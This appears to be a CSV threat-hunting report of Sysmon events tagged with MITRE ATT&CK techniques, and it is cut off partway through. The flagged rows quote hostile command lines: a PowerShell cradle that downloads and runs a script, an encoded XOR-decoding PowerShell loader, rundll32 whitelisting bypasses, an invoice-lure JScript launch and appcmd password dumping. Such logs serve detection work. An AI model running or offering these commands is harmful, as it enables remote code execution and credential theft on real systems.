0xf99eb + 1 + Medium + SHA1=4B1E2F8EFBECB677080DBB26876311D9E06C5020,MD5=1CECEE8D02A8E9B19D3A1A65C7A2B249,SHA256=8AB2F9A4CA87575F03F554AEED6C5E0D7692FA9B5D420008A1521F7F7BD2D0A5,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C + 747F3D96-ABD7-5D3A-0000-001012661000 + 4940 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243534 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.993 + 747F3D96-9F68-5E75-0000-0010B9662000 + 7420 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243534 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.993 + 747F3D96-9F68-5E75-0000-0010B9662000 + 7420 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243534 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.993 + 747F3D96-9F68-5E75-0000-0010B9662000 + 7420 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.143393,2019-05-27T05:29:19.143393+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5949 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.103 + 365ABB72-3D6F-5CEB-0000-001066B5FF00 + 2796 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1564434679.865791,2019-07-30T01:11:19.865791+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("C:\Windows\System32\wscript.exe" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt) and Parent Image :C:\Windows\SysWOW64\rundll32.exe , Parent CommandLine ("C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",) in directory : ( C:\Users\IEUser\AppData\Local\Temp\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4865 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:19.010 + 747F3D96-60F7-5D3F-0000-00106F2F5600 + 6160 + C:\Windows\SysWOW64\wscript.exe + 5.812.10240.16384 + Microsoft ® Windows Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + "C:\Windows\System32\wscript.exe" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt + C:\Users\IEUser\AppData\Local\Temp\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=5D7F2AFD2FF69D379B69DD94033B51EC537E8E52,MD5=F2748908C6B873CB1970DF4C07223E72,SHA256=0FBB4F848D9FB14D7BF81B0454203810869C527C3435E8747A2213DD86F8129A,IMPHASH=3602F3C025378F418F804C5D183603FE + 747F3D96-60F5-5D3F-0000-0010A8D75500 + 4884 + C:\Windows\SysWOW64\rundll32.exe + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1074] Data Staged - Process,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4910 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:23.170 + 747F3D96-6623-5D3F-0000-001011F68700 + 5816 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4910 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:23.170 + 747F3D96-6623-5D3F-0000-001011F68700 + 5816 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( aka105.inwitelecom.net ) , IP ( 105.73.6.105 ) and port ( 80 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4132 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 06:58:40.721 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.15 + IEWIN7..home + 49705 + + false + 105.73.6.105 + aka105.inwitelecom.net + 80 + http + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1019 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-23 17:26:09.417 + 365ABB72-D7B1-5CE6-0000-00102CD76D00 + 2240 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" + D:\ + IEWIN7\IEUser + 365ABB72-CE6C-5CE6-0000-002047F30000 + 0xf347 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-D7B0-5CE6-0000-001077C56D00 + 3388 + \\vboxsrv\HTools\msxsl.exe + msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16392 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:59.727 + 365ABB72-20C7-5CD8-0000-001021022500 + 1416 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16392 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:59.727 + 365ABB72-20C7-5CD8-0000-001021022500 + 1416 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16392 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:59.727 + 365ABB72-20C7-5CD8-0000-001021022500 + 1416 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557681649.458113,2019-05-12T21:20:49.458113+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16513 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:20:49.261 + 365ABB72-55F1-5CD8-0000-0010781C3300 + 2392 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-55F1-5CD8-0000-00108A153300 + 3668 + C:\Windows\System32\ftp.exe + "C:\Windows\System32\ftp.exe" -s:c:\users\ieuser\appdata\local\temp\ftp.txt + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.063277,2019-05-27T05:29:19.063277+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5946 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.023 + 365ABB72-3D6F-5CEB-0000-0010A6B1FF00 + 1508 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6AD